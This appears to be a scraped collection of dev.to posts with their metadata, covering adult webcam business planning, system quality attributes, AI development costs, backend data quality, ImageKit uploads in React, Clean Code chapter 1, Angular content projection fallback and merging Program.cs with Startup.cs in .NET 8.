Consult Legal Experts:** Navigate local laws and regulations to ensure compliance. **ii. Obtain Necessary Licenses:** Secure permits and licenses required for adult entertainment operations. ### 3. Technical Development **i. Choose a Reliable Development Team:** Partner with experienced developers familiar with adult webcam site requirements. **ii. Platform Features:** Implement essential features like live streaming, chat functionalities, payment gateways, and security protocols. **iii. User Experience (UX) Design:** Create an intuitive interface that enhances user engagement and navigation. ### 4. Monetization Strategies **i. Subscription Models:** Offer premium memberships for exclusive content and features. **ii. Tip-Based Interactions:** Enable viewers to tip performers during live sessions. **iii. Advertising Revenue:** Explore opportunities for targeted advertising partnerships. ### 5. Marketing and Launch **i. SEO and Digital Marketing:** Optimize for search engines and leverage social media to attract users. **ii. Launch Strategy:** Plan a phased rollout, gather feedback, and iterate based on user insights. ## Cost Considerations The cost of developing an adult webcam website can vary based on factors such as: **i. Technical Complexity:** Advanced features like high-quality streaming and real-time interactions increase development costs. **ii. Legal and Compliance Expenses:** Legal consultations, obtaining licenses, and ensuring regulatory compliance add to initial investments. **iii. Marketing and Maintenance:** Budget for ongoing marketing efforts and platform maintenance to sustain growth and engagement. ## Conclusion Operating a webcam business can be legally viable and financially rewarding with careful planning, compliance with regulations, and strategic development. 
By understanding the legal framework, investing in robust technical solutions, and implementing effective monetization strategies, entrepreneurs can navigate the complexities of the adult webcam industry while maximizing opportunities for success. Whether embarking on a new venture or expanding an existing portfolio, the adult webcam sector offers a dynamic space for innovation and profitability in the digital entertainment landscape.
scarlettevans09
1,909,016
Event delegation, Event propagation, Bubbling, Capturing
Stop Propagation -
0
2024-07-02T13:53:14
https://dev.to/husniddin6939/-event-delegation-event-propagtion-bubling-capturing-mf3
1. Stop Propagation -
husniddin6939
1,909,009
Things to Expect from a System
Every System out there which serves a purpose, have all this. Leaders are those, who actively...
0
2024-07-02T13:52:06
https://dev.to/paihari/things-to-expect-from-a-system-590c
nfr, systemofrecords, systemofengagement
Every system out there which serves a purpose has all of this. Leaders are those who actively identify, adapt, and even change before the due time. **Performance:** The speed at which a system operates and processes data, including response time, throughput, and latency. **Reliability:** The ability of a system to operate consistently and accurately over time without failures. **Availability:** The degree to which a system is operational and accessible when required for use, often expressed as a percentage of uptime. **Scalability:** The capacity of a system to handle increased load or expand to accommodate growth without compromising performance. **Security:** The protection of a system against unauthorized access, data breaches, and other vulnerabilities. This includes aspects like authentication, authorization, encryption, and auditing. **Maintainability:** The ease with which a system can be maintained, including aspects of code readability, modularity, and documentation. **Usability:** The ease with which users can interact with a system, including interface design, accessibility, and user experience. **Portability:** The ability of a system to operate on different platforms or environments with minimal modifications. **Interoperability:** The capability of a system to interact and communicate effectively with other systems. **Compliance:** Adherence to laws, regulations, guidelines, and specifications relevant to the industry or domain. **Flexibility:** The ease with which a system can adapt to changes in requirements or environments. **Efficiency:** The optimal use of resources by a system, including processing power, memory, and bandwidth. **Auditability:** The ability to trace system activities and operations to support auditing and compliance requirements. **Recovery:** The ability of a system to recover from failures, including backup, failover, and disaster recovery mechanisms. 
**Localization:** The ability of a system to support different languages, regional settings, and cultural expectations.
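The availability attribute above is commonly quantified as uptime divided by total observed time; a small illustrative calculation:

```python
def availability_percent(uptime_hours: float, downtime_hours: float) -> float:
    """Availability = uptime / (uptime + downtime) * 100."""
    total = uptime_hours + downtime_hours
    if total == 0:
        raise ValueError("no observed time")
    return uptime_hours / total * 100

# "Three nines" (99.9%) corresponds to roughly 8.76 hours of downtime
# over a 8760-hour year: availability_percent(8760 - 8.76, 8.76) ~= 99.9
```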
paihari
1,909,014
How Much Does AI Cost? Exploring Pricing Factors and Implementation Types
AI has revolutionized the world, promising giant breakthroughs everywhere. Many businesses dream of...
0
2024-07-02T13:51:06
https://dev.to/devler_io/how-much-does-ai-cost-exploring-pricing-factors-and-implementation-types-e8f
webdev, ai
AI has revolutionized the world, promising giant breakthroughs everywhere. Many businesses dream of repeating the success of #ChatGPT, 🧐 but there is one simple question to answer: What’s the price, and is the game worth the candle? 🤔 You may be surprised that simple #AI models cost as little as $5,000. It’s not such a heavy price tag. Read our article, which is packed with figures and insights, and learn: 🟢 Factors influencing AI cost 🟢 Implementation types and their costs 🟢 Additional cost considerations 👉 Read and find out how much your #project costs. Devler.io will also help you find the right specialists for implementation. 👉 [Read article](https://devler.io/blog/how-much-does-ai-cost?slug=how-much-does-ai-cost)
devler_io
1,907,492
Data Organisation: Ensuring data quality in backend systems
When it comes to backend development, one of the biggest challenges we face is managing the issues...
0
2024-07-02T13:46:57
https://dev.to/blessingtutka/data-organisation-ensuring-data-quality-in-backend-systems-380b
backend, data, database, performance
When it comes to backend development, one of the biggest challenges we face is managing the issues that arise from disorganized data. In the world of backend development, data is king. It's the fuel that powers our applications, providing the information that drives the user experience. Before this data becomes the quality output our users can easily interact with, it must be carefully handled. One of the main roles of a backend developer is data processing, which involves building and maintaining the mechanisms that process data and perform actions on websites. **Challenge**: Ensuring data quality in backend systems. Disorganized data, characterized by inconsistencies, missing values, and incorrect formats, can significantly impact application performance and user experience. ## What is back-end development? Back-end development means working on server-side software, which focuses on everything you can’t see on a website page. This work is done by backend developers who use code that helps browsers or any other application communicate with servers (computers or software programs/applications that provide services or resources to other computers or applications) and/or with databases (organized collections of data). ## The Importance of Data Quality Poorly organized and inconsistent data can lead to a cascade of problems: - **Bugs and Errors**: Inconsistent data can cause unexpected errors and crashes in applications, leading to a bad user experience. - **Inaccurate Insights**: If data is unreliable, the insights we derive from it will also be unreliable. - **Security Risks**: Unstructured data can create vulnerabilities, making systems more susceptible to security breaches. - **Wasted Time and Resources**: Cleaning and organizing data takes time and resources. You solve problems that you wouldn't have to solve if your data were organized. - **Poor Performance**: Disorganized data can degrade application performance, resulting in a negative user experience. 
Investing in data organization provides numerous benefits: - **Improved Application Performance**: Clean and well-organized data leads to faster and more efficient data processing, resulting in a smoother user experience. - **Enhanced Data Accuracy**: Data validation and cleaning ensure data accuracy, leading to more reliable insights. - **Increased Security**: Organized data makes it easier to implement security measures and protect sensitive information. - **Reduced Development Costs**: By eliminating data-related issues, you can reduce development time and costs associated with debugging and fixing errors. ## Ensuring data quality with well-organized data Maintaining well-organized data is one of the keys to ensuring high data quality in backend systems. One of the most used tools to organize and store your data is a **database management system** (**DBMS**). There are many DBMSs out there, each with its own pros and cons; for more info you can read this [DBMS comparison article](https://www.altexsoft.com/blog/comparing-database-management-systems-mysql-postgresql-mssql-server-mongodb-elasticsearch-and-others/). Here are some tips for organizing your data well to ensure data quality in backend systems: - **Data Normalization**: Use database normalization techniques to reduce data redundancy and improve data consistency. For more info you can read this [data normalization blog](https://www.splunk.com/en_us/blog/learn/data-normalization.html) - **Efficient Data Storage**: Use appropriate database management systems (DBMS) according to your needs. - **Data Validation**: Implement validation rules to enforce data integrity. This includes type checking, range checks, and format validation. - **Data Cleaning**: Develop routines to identify and correct errors in data, such as missing values, duplicate entries, and inconsistent formats. - **Data Transformation**: Convert data into a format that is suitable for your specific application and use case. 
- **Data Governance**: Establish clear policies and procedures for data management, including access control, data retention, and data security. ## My first Experience with backend development For my final year project in computer science, I chose to learn Python and Django, a web development framework for backend applications. I started learning these new technologies six months before the deadline while also taking my degree courses. This self-learning helped me complete my project in three months. I faced many challenges; one of them was transforming facts and problems into computerized and organized data accessible through digital technologies, such as websites, as this was my first practical project. My final year project, an attendance management system, required research and practice. I overcame these difficulties by reading articles and books, following tutorials, and engaging in practical projects and exercises. ## Expectations for HNG Internship As a participant in the HNG internship program, I'm looking forward to improving my backend development skills, collaborating with skilled developers, and contributing to exciting projects. This internship provides a valuable platform to assimilate industry best practices from seasoned professionals and apply them to practical projects. I'm looking forward to working with you and creating innovative solutions together. If you’re interested in learning more about the HNG Internship, check out these links: - [HNG Internship](https://hng.tech/internship) - [HNG Hire](https://hng.tech/hire) That's a wrap! We've come to the end. There's so much more, but we've covered the essential key points about ensuring data quality. It's up to you to continue your research. If you have any questions or suggestions feel free to drop a comment below. We're all in this together to learn and grow! SURPASS YOUR LIMITS 😎😎 THANKS, AND GOOD LUCK 😊💪
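The validation tips from earlier in the article (type checking, range checks, and format validation) can be sketched as a small standalone routine; this is an illustrative example of mine, not tied to any particular DBMS or framework:

```python
import re

def validate_user_record(record: dict) -> list:
    """Return a list of validation errors for a user record (empty list = valid)."""
    errors = []
    # Type check: name must be a non-empty string
    if not isinstance(record.get("name"), str) or not record["name"].strip():
        errors.append("name must be a non-empty string")
    # Range check: age must be a plausible integer
    age = record.get("age")
    if not isinstance(age, int) or not (0 <= age <= 150):
        errors.append("age must be an integer between 0 and 150")
    # Format check: a very loose email shape (real apps should use a vetted library)
    email = record.get("email", "")
    if not isinstance(email, str) or not re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", email):
        errors.append("email format is invalid")
    return errors
```

Running every record through a routine like this before it reaches the database catches the inconsistencies and missing values described above at the boundary, rather than in production queries.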
blessingtutka
1,909,011
Effortless Image Uploads in React Using ImageKit
It's good Imagekit is an amazing and easy-to-use tool that streamlines the process...
0
2024-07-02T13:46:28
https://dev.to/leg_end/effortless-image-uploads-in-react-using-imagekit-hoh
javascript, webdev, softwaredevelopment, programming
## It's good [Imagekit](https://imagekit.io/) is an amazing and easy-to-use tool that streamlines the process of: 1. Managing both videos and images 2. Working with various storage locations 3. Manipulating digital assets ## In React project [Integrating ImageKit](https://imagekit.io/docs/integration/react#setup-imagekit-react-sdk) into a React project is quite straightforward. The project required storing the images uploaded by users in a media gallery. ### Installation First, install the SDK: `npm i imagekitio-react` ### Initialization parameters Create an account. You'll find the _Default url endpoint, public key and private key_ on your dashboard. ![IKUpload component](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35bovrcdorjqpxikdt9s.png) ### Authentication function The `authenticator` function fetches security parameters from the backend, completing the setup process. ### Backend setup The project required [uploading files](https://imagekit.io/docs/integration/react#uploading-files-in-react) from React. To handle image uploads, the first step is to set up the backend using Express and install the needed dependency. `npm i imagekit express` ## Configuring ImageKit Now, the 3 parameters obtained earlier (_URL endpoint, public key and private key_) are used to get the security params: _token, expire, signature_. ![Backend app setup](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t9lyolvc16y041v3bymm.png) ## Fetching auth params The route defined above fetches the auth parameters which are used by the frontend. With the backend app running, authenticate and upload images in the React app. The component: ![The input file upload component](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lmilxkvkamfgw2m9qdxk.png) Notice the 2 functions for handling error and success. Also, the props id (for identifying the respective label) and multiple (to ensure users can add multiple files) help define the input wherever the component is used. ## So... 
Integrating ImageKit in the app simplified image management, providing a seamless experience for both developers and users. With this setup, handling image uploads, optimizing delivery, and applying real-time transformations got easier.
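For readers who prefer text over the screenshots: the backend auth endpoint ultimately returns `token`, `expire`, and `signature` values. As a hedged sketch (the exact signing scheme is defined by ImageKit's documentation and SDK; here it is assumed to be an HMAC-SHA1 of token + expire keyed with the private key, and the key value is a placeholder):

```python
import hashlib
import hmac
import time
import uuid

PRIVATE_KEY = "private_xxx"  # placeholder; never ship the real key to the frontend

def auth_params(private_key: str = PRIVATE_KEY) -> dict:
    """Build token/expire/signature auth parameters (assumed HMAC-SHA1 scheme)."""
    token = str(uuid.uuid4())
    expire = str(int(time.time()) + 600)  # valid for ~10 minutes
    signature = hmac.new(
        private_key.encode(), (token + expire).encode(), hashlib.sha1
    ).hexdigest()
    return {"token": token, "expire": expire, "signature": signature}
```

In the article's setup this computation is done for you by the `imagekit` Node package behind the Express route; the sketch only shows why the private key must stay server-side.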
leg_end
1,909,010
Waakif Technologies Private Limited
Waakif Technologies Private Limited: Unleash the Power of AI to Transform Your Customer...
0
2024-07-02T13:45:13
https://dev.to/waakif/waakif-technologies-private-limited-1145
ai, digitalworkplace
**[Waakif Technologies Private Limited](https://www.waakif.com/)**: Unleash the Power of AI to Transform Your Customer Experience Transform customer churn into explosive growth. Waakif, your AI-powered business partner, empowers you to skyrocket retention and triple customer engagement. Through intelligent automation, Waakif personalizes interactions, fostering deeper connections and unwavering loyalty. Go beyond data; gain actionable intelligence. Our platform harnesses the power of AI to unlock valuable insights hidden within your customer data. Optimize marketing campaigns, personalize offerings with laser precision, and even predict customer needs – all with Waakif's intelligent guidance. Tailored for your success, not a one-size-fits-all solution. Waakif boasts advanced customization, allowing you to seamlessly integrate the platform into your existing workflows and adapt it to your specific business goals. Whether you're a nimble startup or a well-established enterprise, Waakif becomes a powerful tool on your unique path to success. Gain a competitive edge through data-driven decision making. Waakif empowers you to deliver exceptional customer experiences that keep them coming back for more. Combined with the insights gleaned from AI, you'll have the tools necessary to surpass your competitors and become an industry leader. Waakif is the key to unlocking explosive customer retention, optimizing your marketing efforts, and propelling your business to the forefront of the market. ## CONTACT US: Email: support@waakif.com Contact: +91- 9161630891 Communication: Waakif Technologies Private Limited (Ashiyana) 5 Nehrunagar Raiya Road, Rajkot GJ - 360007 (India)
waakif
1,909,006
Bar Programming #03 — Clean Code Chapter 1
In today's post, I will write a summary of what I learned and understood about the first chapter of...
0
2024-07-02T13:41:22
https://dev.to/samoht/bar-programming-03-clean-code-chapter-1-39d6
beginners, learning
In today's post, I will write a summary of what I learned and understood about the first chapter of “Clean Code”; I will probably write more posts like this about the other chapters. So, if you are interested in Clean Code or want to understand a little about it, you are more than welcome to continue reading this possible series. The Clean Code book was written by Robert Cecil Martin, aka Uncle Bob. In it he covers techniques, rules, and ideas that aim to improve the readability of code and the efficiency of development. The first chapter covers the following topics: - What is bad code? - What is the cost of having bad code? - What is clean code? - Recommendations ## What is Bad Code? To explain the importance of good code, Uncle Bob cites the example of an application developed in the 80s that became quite popular. But the interval between updates started to increase, bugs were not fixed, and load times and crashes grew worse and worse, until it reached the point of being unusable. Some time later, he met one of its developers and found that the reason behind this chaos was as expected: the code had become incomprehensible and increasingly makeshift, to the point where it was no longer possible to update or maintain it. ## Why do we write bad code? But why? Why do we write bad code? Bad code has the power to slow us down. One likely reason is hurry: we have deadlines to meet, the demands need to be completed, and we feel we can't afford to spend time cleaning the code. Or perhaps the wear and tear of working on that project has grown so great that we just want to finish it once and for all and set it aside. ## The cost of having bad code We see the cost of bad code when we read someone else's code and its confusion makes us work more slowly; our own code can produce the same effect. 
Even when we start fast, we may suddenly notice that it takes us longer and longer to make progress. This happens because these errors are like a snowball: the more we set them aside and postpone the cleanup, the slower our progress becomes. According to the author, these bugs push team productivity toward zero. With that in mind, the author says that even if we think “I need to fulfill the demand, or I will be fired”, we need to communicate with our superiors and warn them that the demand needs more time. We need to protect our code and insist that it requires more attention, so that the same thing that happened to the application mentioned earlier doesn't happen to us. ## What is Clean Code? Let's say you believe me that bad code is an obstacle to building software, and you want to write good code; so, how do you write clean code? It should be noted that writing clean code is not as simple as flipping a switch in our heads; it requires a certain sensitivity toward code: understanding which things are turning our code into bad code, and which techniques can be applied to fix them. Writing clean code is like drawing: being able to judge whether a drawing is good doesn't make you able to draw, so knowledge of techniques and strategies is necessary. So, getting to the main question, we can summarize clean code as code that follows these four rules: - **No duplication**: no repeated functionality exists. - **One task**: the code must have only one purpose, and so must its functions; everything must do only one thing. - **Expressiveness**: the code must be very clear in how things are named. - **Small abstractions**: create methods and classes that encapsulate specific features in a clear way, without becoming excessively complex or multifunctional. 
In general, we can describe clean code by paraphrasing Ward Cunningham: > Clean code does exactly what you think it does; it is as if the language was made for that very thing. Nothing surprises you; everything is how you expected. ## Recommendations Of course, the rules for writing clean code can vary a lot; the rules mentioned in the “Clean Code” book are not the only ones, because they are the author's vision. His vision is supported and used by many people, but still, not everyone will agree that this is the best way to write clean code. The author recommends that we read the book, learn from him, and decide for ourselves. He says that for him and his colleagues these rules are the best, but he doesn't demand that we think the same way, because we may well reject one rule or another. Uncle Bob also tells us that we have the responsibility to write code that is easy to read; after all, while writing code, a good part of the job is reading other code. When we are reading, we want that reading to be easy to understand. So, we need to write code knowing that someone will read it, aiming to write something that is easy for other people to read. Finally, Uncle Bob also tells us to follow the Boy Scout rule: > Leave the campground cleaner than you found it. The idea behind this recommendation is that instead of only writing clean code, we must also maintain it. In other words, we must constantly think of small cleanup improvements to our code, and this doesn't need to be a big thing: renaming a variable is enough. ## Conclusion With this, we can understand the need for and importance of clean code, as well as what clean code is. In the next chapter, we will see how we can give better names to our children (variables and functions).
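As a small illustration of the “one task” and “expressiveness” rules (my own hypothetical example, not one from the book), a function that both parses and totals can be split into two well-named functions that each do one thing:

```python
# Before: one function parses the line AND sums the values (two tasks, vague name).
def process(line):
    return sum(int(x) for x in line.split(","))

# After: each function does exactly one thing, and the names say what they do.
def parse_amounts(line: str) -> list:
    """Parse a comma-separated line of integers into a list."""
    return [int(field) for field in line.split(",")]

def total_amount(amounts: list) -> int:
    """Sum a list of amounts."""
    return sum(amounts)
```

The behavior is identical, but the second version lets each piece be read, tested, and reused on its own.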
samoht
1,909,005
Cleaning Fairies VA Expert Cleaning Services in North Virginia.
A clean home is a happy home! Cleaning Fairies provides top-rated cleaning services across Virginia,...
0
2024-07-02T13:40:54
https://dev.to/cleaningfairiesva/cleaning-fairies-va-expert-cleaning-services-in-north-virginia-42gb
cleaning, cleaningfairiesva, cleaningservices, northvirginia
A clean home is a happy home! Cleaning Fairies provides top-rated cleaning services across Virginia, including home cleaning services, residential cleaning, move-out cleaning, and commercial cleaning. We take the stress out of keeping your space spotless so you can focus on what matters most. Get a free quote today.
cleaningfairiesva
1,909,002
Content Projection Fallback in ng-content in Angular
Introduction In this blog post, I want to describe a new Angular 18 feature called content...
27,826
2024-07-02T13:38:46
https://www.blueskyconnie.com/content-projection-fallback-with-ng-content-in-angular-18/
angular, tutorial
## Introduction In this blog post, I want to describe a new Angular 18 feature called content projection fallback in ng-content. When content exists between the ng-content opening and closing tags, it becomes the fallback value. When projection does not occur, the fallback value is displayed. ### Bootstrap Application ```typescript // app.config.ts import { ApplicationConfig, provideExperimentalZonelessChangeDetection } from '@angular/core'; export const appConfig: ApplicationConfig = { providers: [ provideExperimentalZonelessChangeDetection() ] }; ``` ```typescript // main.ts import { bootstrapApplication } from '@angular/platform-browser'; import { appConfig } from './app.config'; bootstrapApplication(App, appConfig); ``` Bootstrap the application by passing the App component and the application configuration to `bootstrapApplication`. ### Create a Card Component The `AppCardComponent` displays the default tier and its default features. Then, an `AppPricingListComponent` encapsulates the `AppCardComponent` and passes the custom tier and features to it to display. Finally, the App component consists of `AppCardComponent` and `AppPricingListComponent` to build the full pricing page. ```typescript // app-card.component.ts import { ChangeDetectionStrategy, Component } from "@angular/core"; @Component({ selector: 'app-card', standalone: true, template: ` <div class="header"> <ng-content select="[header]">Free Tier</ng-content> </div> <div class="content"> <ng-content> <ul> <li>Free of Charge</li> <li>1 License</li> <li>500MBs Storage</li> <li>No Support</li> </ul> </ng-content> </div> <div class="footer"> <ng-content select="[footer]"> <button>Upgrade</button> </ng-content> </div> `, changeDetection: ChangeDetectionStrategy.OnPush, }) export class AppCardComponent {} ``` The template of the `AppCardComponent` has three sections: header, content, and footer. The header section consists of an `ng-content` that projects to an element with a header attribute. When the projection does not occur, the fallback value, "Free Tier", is displayed. The content section comprises an `ng-content` element that projects to the default element. 
This section renders the free tier's features when the projection does not occur. The footer section comprises an `ng-content` element that projects to an element with a footer attribute. When the projection does not occur, the upgrade button is rendered. ### Create a Price Listing Component This is a simple component that encapsulates `AppCardComponent` to display the signal input values of a tier and its features. ```typescript // app-price-list.component.ts import { ChangeDetectionStrategy, Component, input } from "@angular/core"; import { AppCardComponent } from "./app-card.component"; @Component({ selector: 'app-price-list', standalone: true, imports: [AppCardComponent], template: ` <section> <h2>Custom Content</h2> <app-card> <div header>{{ tier() }}</div> <ul> @for (item of features(); track item) { <li>{{ item }}</li> } </ul> </app-card> </section> `, changeDetection: ChangeDetectionStrategy.OnPush, }) export class AppPricingListComponent { tier = input<string>(''); features = input<string[]>([]); } ``` ### Build a full pricing page using content projection fallback ```typescript // main.ts import { Component, VERSION } from '@angular/core'; import { AppCardComponent } from './app-card.component'; import { AppPricingListComponent } from './app-price-list.component'; @Component({ selector: 'app-root', standalone: true, imports: [AppCardComponent, AppPricingListComponent], template: ` <header>Angular {{version}} - Content Projection fallback </header> <main> <section> <h2>Fallback content</h2> <app-card /> </section> <app-price-list tier="Start-up" [features]="startUpFeatures" /> <app-price-list tier="Company" [features]="companyFeatures" /> <section> <h2>Custom Content</h2> <app-card> <div header>Enterprise</div> <ul> <li>Contact sales for quotation</li> <li>200+ Licenses</li> <li>1TB Storage</li> <li>Email and Phone Technical Support</li> <li>99.99% Uptime</li> </ul> <div footer>&nbsp;</div> </app-card> </section> </main> `, }) export class App { version = 
VERSION.full; startUpFeatures = [ 'USD 10/month', '3 Licenses', '1GB Storage', 'Email Technical Support', ]; companyFeatures = [ 'USD 100/month', '50 Licenses', '20GB Storage', 'Email and Phone Technical Support', '95% Uptime' ]; } ``` The pricing page has four cards: the free tier card displays the fallback values because the `AppCardComponent` does not have a body. The startup and company cards use the footer's fallback value and project the header and features. Therefore, both cards still display the upgrade button. Similarly, the enterprise card projects the header and features. It also projects the footer to replace the upgrade button with a blank row. The following Stackblitz repo displays the final results: {%embed https://stackblitz.com/edit/angular-content-projection-fallback-qh5hcd?file=src%2Fmain.ts %} This is the end of the blog post that describes content projection fallback with ng-content in Angular 18. I hope you like the content and continue to follow my learning experience in Angular, NestJS, GenerativeAI, and other technologies. ## Resources - Stackblitz Demo: https://stackblitz.com/edit/angular-content-projection-fallback-qh5hcd?file=src%2Fmain.ts - Github Repo: https://github.com/railsstudent/ng-content-projection-default-demo - Github Page: https://railsstudent.github.io/ng-content-projection-default-demo/
railsstudent
1,897,279
Merging Startup.cs and Program.cs in .NET 8: A Simplified Approach
As .NET evolves, so does the way we structure our applications. One notable change introduced in...
0
2024-07-02T13:38:05
https://www.webscope.io/blog/merging-startup.cs-and-program.cs-in-.net-8-a-simp
As .NET evolves, so does the way we structure our applications. One notable change introduced in recent versions of .NET is the ability to merge `Startup.cs` and `Program.cs` into a single file. This approach streamlines the setup process, making it more cohesive and manageable. This article will discuss the rationale behind merging these files, walk through the process, and highlight potential advantages and pitfalls. ## Why Merge Startup.cs and Program.cs? Okay, first let me try to find some advantages and also why it can be a bad idea. ### Advantages 1. **Simplified Structure**: By consolidating `Startup.cs` and `Program.cs`, you create a single entry point for application configuration. This can make the codebase more straightforward to navigate and understand. Updates to configuration or middleware can be made in one file rather than spread across multiple files, reducing the likelihood of inconsistencies and errors. 2. **Improved Testability**: With all configurations in one place, writing integration tests becomes simpler. Conditions and configurations are centralized, making it easier to mock dependencies and test different scenarios. ### Potential Pitfalls 1. **Complexity in Large Applications**: For very large applications, having all configurations in one file might become unwieldy. It's essential to balance simplicity with readability. 2. **Migration Challenges**: If you're transitioning an existing application, merging these files might introduce bugs if not done carefully. A rollback could be a nightmare (speaking from experience!). 
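To make the testability advantage above concrete: with the merged hosting model, an integration test can boot the entire pipeline through `WebApplicationFactory`. This is a minimal sketch, assuming an xUnit test project that references the web project and a `Program` type visible to tests (for example via `public partial class Program {}` at the bottom of Program.cs); the test and endpoint names are illustrative, not from the original code.

```csharp
using System.Net;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc.Testing;
using Xunit;

public class SmokeTests : IClassFixture<WebApplicationFactory<Program>>
{
    private readonly WebApplicationFactory<Program> _factory;

    public SmokeTests(WebApplicationFactory<Program> factory) => _factory = factory;

    [Fact]
    public async Task Root_endpoint_responds()
    {
        // The factory runs the merged Program.cs, so configuration, logging,
        // services, and middleware are all exercised from one entry point.
        var client = _factory.CreateClient();
        var response = await client.GetAsync("/");
        Assert.NotEqual(HttpStatusCode.InternalServerError, response.StatusCode);
    }
}
```

Testing-specific branches (such as the `AUTOMATED_TESTING` check) can be driven by setting the environment variable in the test process before the factory creates the client.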
## The Old Way: Separate Startup.cs and Program.cs ### Original Program.cs ```csharp using Microsoft.Extensions.Configuration.AzureAppConfiguration; using Microsoft.Extensions.Logging.ApplicationInsights; using System.Diagnostics; public class Program { public static void Main(string[] args) { try { Debug.WriteLine("Configure infrastructure..."); BuildHost(args).Run(); } catch (Exception ex) { Debug.WriteLine($"Infrastructure configuration failed: {ex}"); } } public static IHost BuildHost(string[] args) { // Configuration and host building logic } } ``` ### Original Startup.cs ```csharp using Microsoft.AspNetCore.Http.Features; using Microsoft.EntityFrameworkCore; using Microsoft.Extensions.Options; using Microsoft.FeatureManagement; using System.Diagnostics; public class Startup { public Startup(IConfiguration configuration, IWebHostEnvironment webHostEnvironment) { Configuration = configuration; WebHostEnvironment = webHostEnvironment; } public IConfiguration Configuration { get; } public IWebHostEnvironment WebHostEnvironment { get; } // Methods for configuring services and middleware } ``` ## The New Combined Mode ### Combined Program.cs ```csharp using Azure.Identity; using Microsoft.AspNetCore.Http.Features; using Microsoft.EntityFrameworkCore; using Microsoft.Extensions.Configuration.AzureAppConfiguration; using Microsoft.Extensions.Logging; using Microsoft.Extensions.Logging.ApplicationInsights; using Microsoft.FeatureManagement; using Newtonsoft.Json.Converters; using System.Diagnostics; var builder = WebApplication.CreateBuilder(args); // Configuration setup // Using builder.Configuration to setup configuration sources builder.Configuration.AddAzureAppConfiguration(options => { options.UseFeatureFlags(o => { o.Label = "InstanceName"; // Replace with your instance name o.CacheExpirationInterval = TimeSpan.FromMinutes(10); }); options.ConfigureKeyVault(o => { o.SetCredential(new DefaultAzureCredential()); // Replace with your Azure credential 
o.SetSecretRefreshInterval(TimeSpan.FromMinutes(30)); }); options.Connect("YourAppConfigurationEndpoint", new DefaultAzureCredential()) // Replace with your endpoint and credential .ConfigureRefresh(o => { o.Register("Settings:Sentinel", refreshAll: true) .SetCacheExpiration(TimeSpan.FromMinutes(10)); }) .Select(KeyFilter.Any, LabelFilter.Null) .Select(KeyFilter.Any, labelFilter: "InstanceName"); // Replace with your instance name }); if (builder.Environment.IsDevelopment()) { builder.Configuration.AddJsonFile("appsettings.json", optional: true); builder.Configuration.AddUserSecrets<Program>(); } builder.Configuration.AddEnvironmentVariables(); // Logging setup // Using builder.Logging to setup logging providers builder.Logging.ClearProviders(); // Clear default providers builder.Logging.AddConsole(); // Add console logging builder.Logging.AddDebug(); // Add debug logging builder.Logging.AddAzureWebAppDiagnostics(); // Add Azure diagnostics if (!builder.Environment.IsDevelopment() && Environment.GetEnvironmentVariable("AUTOMATED_TESTING") is null) { builder.Logging.AddApplicationInsights(config => { config.ConnectionString = builder.Configuration["APPLICATIONINSIGHTS_CONNECTION_STRING"]; config.DisableTelemetry = false; }, options => options.IncludeScopes = false); } // Services setup var services = builder.Services; services.AddControllers().AddNewtonsoftJson(opt => opt.SerializerSettings.Converters.Add(new StringEnumConverter())); services.AddDbContext<YourDbContext>(options => options.UseSqlServer(builder.Configuration.GetConnectionString("DefaultConnection"))); services.AddFeatureManagement(); services.AddAzureAppConfiguration(); // Register other services as needed // Middleware setup var app = builder.Build(); app.UseRouting(); app.UseAuthentication(); app.UseAuthorization(); app.MapControllers(); app.Run(); // Utility local functions for retrieving services (top-level statements do not allow access modifiers here) static T GetService<T>(IServiceCollection services) { ServiceProvider serviceProvider = 
services.BuildServiceProvider(); return serviceProvider.GetService<T>() ?? throw new Exception($"Could not find service {typeof(T)}"); } static T GetService<T>(IApplicationBuilder app) { return app.ApplicationServices.GetService<T>() ?? throw new Exception($"Could not find service {typeof(T)}"); } static void DebugWrite(string message) { Console.WriteLine(message); Debug.WriteLine(message); } ``` ### Key Points in the Combined File - **Configuration**: Configuration sources are added using `builder.Configuration`. This includes Azure App Configuration, JSON files, user secrets, and environment variables. - **Logging**: Logging is set up using `builder.Logging` with different providers for console, debug, and Application Insights. The `builder.Logging` API simplifies logging configuration by providing a centralized way to add and configure logging providers. - **Services**: All service configurations, including custom services, middleware, and feature management, are consolidated. Using `builder.Services` makes it straightforward to register services with the dependency injection container. - **Middleware**: Middleware components are configured in one place, improving readability and maintainability. The `app.UseRouting()`, `app.UseAuthentication()`, and `app.UseAuthorization()` methods set up the middleware pipeline. ### Our Experience and Story In our project, we have more than 100 active production instances, each with unique configuration and settings. We faced numerous conditions for integration tests, such as checking `Environment.GetEnvironmentVariable("AUTOMATED_TESTING")` or custom feature flag conditions based on license. All those conditions determine whether the application should use a different database or configure other testing-specific settings. Managing these conditions across multiple files was a pain. 
Since merging `Startup.cs` and `Program.cs`, we have gained a much nicer overview and more control over our application. The centralized configuration has made it significantly easier to maintain and extend our application, particularly when writing and running integration tests and switching custom features. ### Conclusion Merging `Startup.cs` and `Program.cs` can streamline your .NET applications, making them easier to test and maintain. However, be cautious during the transition to avoid introducing bugs. Start by merging the files as they are before making any improvements. This way, if something goes wrong, you'll have an easier time debugging (trust me, it happened to me...). By following the steps and best practices outlined in this article, you can take advantage of the modern .NET hosting model and simplify your application's setup.
manhhungtran
1,909,004
Implementing Pinia for Efficient State Management in Nuxt.js Online Stores
Check this post in my web notes! In this article, we will talk about the Pinia store for Nuxt.js...
27,540
2024-07-02T13:35:12
https://webcraft-notes.com/blog/implementing-pinia-for-efficient-state-management-in
nuxt, vue, javascript, tutorial
